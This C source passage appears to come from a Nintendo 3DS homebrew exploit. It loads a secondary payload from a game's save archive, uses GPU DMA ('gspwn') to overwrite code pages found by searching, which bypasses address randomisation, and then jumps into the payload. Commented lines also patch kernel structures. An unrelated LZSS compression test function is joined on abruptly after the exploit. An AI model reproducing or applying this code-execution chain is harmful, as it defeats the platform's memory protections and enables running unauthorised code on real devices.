// // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
// //patch arbitrateAddress
// patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
// //wake threads
// svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
// svc_signalEvent(((Handle*)0x354ba8)[2]);
// s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
#endif
// everything else is common
svc_sleepThread(0x10000000);
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//write secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
#ifndef QRINSTALLER
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
#else
memcpy((u8*)0x14100000, (u8*)0x14300000, secondaryPayloadSize);
#endif
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
// doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
// in order to bypass paslr we have to search for individual pages to overwrite...
int i, j;
int k = 0;
for(i = 0; i < CN_CODEBIN_SIZE && k < 0xC; i += 0x1000)
{
for(j = 0; j < 0x0000C000; j += 0x1000)
{
if(!memcmp((void*)(CN_RANDCODEBIN_COPY_BASE + i), (void*)(CN_3DSX_LOADADR + j), 0x20))
{
doGspwn((u32*)(0x14100000 + j), (u32*)(CN_RANDCODEBIN_BASE + i), 0x00001000);
svc_sleepThread(10 * 1000 * 1000);
k++;
break;
}
}
}
svc_sleepThread(0x3B9ACA00);
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
int lzss_test(char* filename, unsigned int* psize, unsigned int* pcompsize)
{
int ret;
unsigned char* in = NULL;
unsigned int insize;
unsigned char* out = NULL;
unsigned int outsize, outmaxsize;
unsigned int crc0, crc1;
print("File: %s\n", filename);
if(!file_get(filename, &in, &insize))
goto error;
*psize = insize;
crc32_init();
crc0 = crc32_buffer(in, insize);
print("crc: %08X\n", crc0);
print("uncompressed size: %d bytes\n", insize);
outmaxsize = 2 * insize;
out = memory_alloc(outmaxsize);
outsize = lzss_compress(in, insize, out, outmaxsize);
if(outsize == -1)
{
print("Compression error\n");
goto error;
}
*pcompsize = outsize;
print("compressed size: %d bytes\n", outsize);
print("ratio: %d%%\n", (outsize * 100) / insize);
memory_set(in, insize, 0);
outsize = lzss_decompress(out, outsize, in, insize);
crc1 = crc32_buffer(in, insize);
if(crc0 != crc1)
{
print("CRCs do not match!\n");
goto error;
}
//if(!file_put("out", in, outsize))
// goto error;
print("Success.\n\n");
ret = 1;
done:
if(in)
memory_free(in);
if(out)
memory_free(out);
return ret;
error:
ret = 0;
goto done;
}
